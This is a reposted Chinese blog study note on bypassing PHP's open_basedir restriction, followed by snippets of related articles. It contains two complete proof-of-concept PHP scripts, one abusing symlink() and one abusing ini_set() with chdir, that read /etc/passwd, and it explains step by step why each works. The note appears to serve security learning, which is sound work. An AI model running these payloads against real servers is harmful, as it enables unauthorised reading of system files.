-------已搬运------绕过 open_basedir学习

最新推荐文章于 2023-08-11 10:36:40 发布
最新推荐文章于 2023-08-11 10:36:40 发布
阅读量500 收藏 2
点赞数
文章标签: linux php
原文链接:https://www.v0n.top/2020/07/10/open_basedir%E7%BB%95%E8%BF%87/
版权

目录:

参考自:open_basedir绕过

环境设置:

shell.php:
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

利用symlink()绕过

symlink()函数

symlink()对于已有的target建立一个名为link的符号连接。
用法如下:

  • symlink (string [Math Processing Error]
    link) symlink()对于已有的 target(一般情况下受限于open_basedir)建立一个名为link的符号连接。
  • 成功时返回TRUE, 或者在失败时返回FALSE。 示例用法如下:
<?php
$target = 'uploads.php';
$link = 'uploads';
symlink($target, $link);

echo readlink($link);
# 将会输出'uploads.php'这个字符串
?>
POC

假如我们要读取/etc/passwd,对应的POC为:

<?php
mkdir("a");
chdir("a");
mkdir("b");
chdir("b");
mkdir("c");
chdir("c");
mkdir("d");
chdir("d");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("a/b/c/d","Von");
symlink("Von/../../../../etc/passwd","exp");
unlink("Von");
mkdir("Von");
system('cat exp');

我的环境没有成功,因为,有disable_function禁用了system。
在这里插入图片描述
成功/etc/passwd/
分析一下这个poc

  1. 首先前面8步,实现了创建a/b/c/d目录,并把当前目录移动到该目录下面。
  2. 接着symlink(“a/b/c/d”,”Von”)创建了一个符号文件Von,指向了a/b/c/d
  3. 接着symlink(“Von/…/…/…/…/etc/passwd”,”exp”),由于此时Von仍然是一个符号文件,所以等价于symlink(“a/b/c/d/…/…/…/…/etc/passwd”,”exp”),由于此时a/b/c/d/…/…/…/…/的结果等于/var/www/html,符合open_basedir的限制,因此软链接可以被成功建立。
  4. 但是之后我们删除了Von这个软链接,并且建立了一个真实的文件夹Von,所以此时上面symlink(“Von/…/…/…/…/etc/passwd”,”exp”)中的Von不再是软链接而是一个真实的目录。从而达到跨目录访问的效果。 其实到了这一步,我们直接访问根目录下的exp文件能得到结果,我上面是为了让结果直观展示出来才利用使用了system(‘cat exp’)来得到结果。(一般情况下system()是被禁的)

利用ini_set()绕过

ini_set()函数

ini_set()用来设置php.ini的值,在函数执行的时候生效,脚本结束后,设置失效。无需打开php.ini文件,就能修改配置。函数用法如下:

ini_set ( string $varname , string $newvalue ) : string
  • varname是需要设置的值
  • newvalue是设置成为新的值
  • 成功时返回旧的值,失败时返回 FALSE
POC
<?php
mkdir('Von');  //创建一个目录Von
chdir('Von');  //切换到Von目录下
ini_set('open_basedir','..');  //把open_basedir切换到上层目录
chdir('..');  //以下这三步是把目录切换到根目录
chdir('..');
chdir('..');
ini_set('open_basedir','/');  //设置open_basedir为根目录(此时相当于没有设置open_basedir)
echo file_get_contents('/etc/passwd');  //读取/etc/passwd

没有绕过 disable_function。这是绕过了 open_basedir。eval还是用不了,这能够读取文件,
在这里插入图片描述

Zero_Adam
关注
PHP绕过open_basedir限制操作文件的方法
12-20
0x00 预备知识 关于open_basedir open_basedirphp.ini中的一个配置选项 它可将用户访问文件的活动范围限制在指定的区域, 假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。 注意用open_basedir指定的限制实际上是前缀,而不是目录名。 举例来说: 若”open_basedir = /dir/user”, 那么目录 “/dir/user” 和 “/dir/user1″都是可以访
绕过open_basedir
unexpectedthing的博客
07-02 1589
open_basedir绕过
学习周报之open_basedir绕过
clearloveQAQ的博客
05-01 826
一: CTFSHOW805: 看到这个地方没有过滤信息就直接试了一下1=system(‘ls’);去读目录但是发现没反应就去看了一下phpinfo发现它是ban了很多函数然后open_basedir也开了所以这题就是要我们绕过open_basedir的题目,这类题在ctfshow命令执行的题中有出现过,就是通过glob协议进行目录读取,但是我忘了所以又重新学了一下glob协议的用法 glob伪协议 1=$a="glob:///*"; if($b=opendir($a)){ w..
15_open_basedir绕过
qq_45301512的博客
02-01 642
将两次结果对比,可以理解open_basedir的作用就是限制访问如果设立在test目录下,那么就只能访问test目录下面的目录或者文件,其它目录下面的内容都无法访问如果不设立open_basedir,任何目录下的内容都可以访问。
绕过 open_basedir
最新发布
m0_64180167的博客
08-11 957
open_basedirphp.ini的设置在open_basedir设置路径的话 那么网站访问的时候 无法访问除了设置以外的内容这里还有一个知识点如果我们设置 open_basedir=/var/www/html那我们只能访问不能访问/var/www/otherfile.php(不在指定目录之下)/var/www/html2/index.php(不是以指定路径为前缀)所以open_basedir并不是以目录名为 规定而是路径我创建了一个test文件夹 存放着 1.php
PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍
10-24
主要介绍了PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍,这个漏洞很久之前(大概5年前)被提出来了,到现在的最新版本中依然存在,需要的朋友可以参考下
mysql-5.6.45-linux-glibc2.12-x86_64.tar.zip
01-21
./scripts/mysql_install_db --user=mysql --basedir=/path/to/extracted/directory --datadir=/var/lib/mysql_data ``` 5. **初始化MySQL**: 初始化MySQL系统表和默认的root用户密码: ``` bin/mysqld_safe ...
xiaoy-sec#Pentest_Note#Open_basedir绕过1
07-25
第一种 第二种 第三种
mysql-8.0.11-linux-glibc2.5-x86_64.tar.gz(安装步骤)
07-02
在开始安装MySQL 8.0.11之前,请确保你的CentOS 6.4系统已更新至最新状态,并且已经安装了必要的依赖库。 **1.1 更新系统** ```bash yum update -y ``` **1.2 安装必要的依赖库** 由于MySQL 8.0.11可能依赖于...
spring-boot-maven-plugin导入本地的一些jar并打包.docx
11-09
${project.basedir}/src/main/resources <filtering>true **/application*.yml **/application*.properties ${project.basedir}/src/main/resources **/application*.yml **/application*....
ng-fuzzy-search:为emacs-ng构建的模糊搜索工具
05-27
ng-fuzzy-search 这是的模糊搜索模块。...Mx fuzzy-search-set-basedir RET DIR 要与emacs-ng一起使用,只需在init.el中包含以下行: (eval-js " import 'https://deno.land/x/fuzzy_search@0.3.0/mod-fuzzy.js' " )
PHP之如何绕过open_basedir
shy的博客
11-27 1448
open_basedir php.ini中原文的说明是: ; open_basedir, if set, limits all file operations to the defined directory ; and below. This directive makes most sense if used in a per-directory or ; per-virtualhost web server configuration file. This directive is ; *N...
PHP绕过open_basedir
灰太的表格的博客
09-05 265
1. 命令执行函数 open_basedir的设置对系统命令执行函数无效 <?php $cmd="cat ../1.txt"; file_get_contents($cmd); echo"file_get_contents finsh"."\n"."-----------------------"."\n"; system($cmd); echo shell_exec($cmd); echo exec($cmd)."\n"; passthru($cmd); $fp = popen($
php open_basedir绕过,PHP 'open_basedir'安全限制绕过漏洞
weixin_42659196的博客
03-16 155
发布日期:2012-07-20更新日期:2012-07-23受影响系统:PHP PHP 5.3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 54612CVE ID: CVE-2012-3365PHP 是一种 HTML 内嵌式的语言,PHP与微软的AS...
php open_basedir绕过,PHP绕过open_basedir列目录的研究
weixin_34236572的博客
03-16 1055
首发drops:http://drops.wooyun.org/tips/3978 。 近期由于在开发自己的webshell,所以对PHP一些已有的漏洞进行了一定的研究,并且也自己发现了部分PHP存在的安全隐患。这篇文章我来与大家分享一下自己对于PHPopen_basedir绕过并列举目录的方法总结。 0x0首发drops:http://drops.wooyun.org/tips/3978 。近...
PHP绕过open_basedir列目录的研究
weixin_33810302的博客
03-08 826
phith0n · 2014/11/21 16:050x00 前言近期由于在开发自己的webshell,所以对PHP一些已有的漏洞进行了一定的研究,并且也自己发现了部分PHP存在的安全隐患。这篇文章我来与大家分享一下自己对于PHPopen_basedir绕过并列举目录的方法总结。0x01 open_basedir的简介Open_basedirPHP设置中为了防御PHP跨目录进行文件(目录)读写...
php5全版本绕过open_basedir读文件脚本 -- phith0n
收集盒 Book box
12-11 1230
漏洞很久之前(大概5年前)被提出来了,但并不是php代码上的问题,所以问题一直存在,直到现在。我一直没留意,后来yaseng告诉我的,他测试了好像5.5都可以。 他在评论里发过了:http://zone.wooyun.org/content/17131,漏洞详情在这里http://cxsecurity.com/issue/WLB-2009110068。 给出我写的EXP: <?php h
浅谈绕过open_basedir 的几种用法
snowlyzz的博客
08-13 5474
简单绕过open_basedir 的几种方法
绕过open_basedir读文件脚本
weixin_34375233的博客
05-03 360
绕过open_basedir读文件脚本2016年11月13日 01:28:21阅读数:1221参加了一场2016年的sycsec感觉又学到不少东西废话不多说,首先啥是open_basediropen_basedir: 将用户可操作的文件限制在某目录下具体的设置方法可以参考:http://blog.csdn.net/white__cat/arti...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值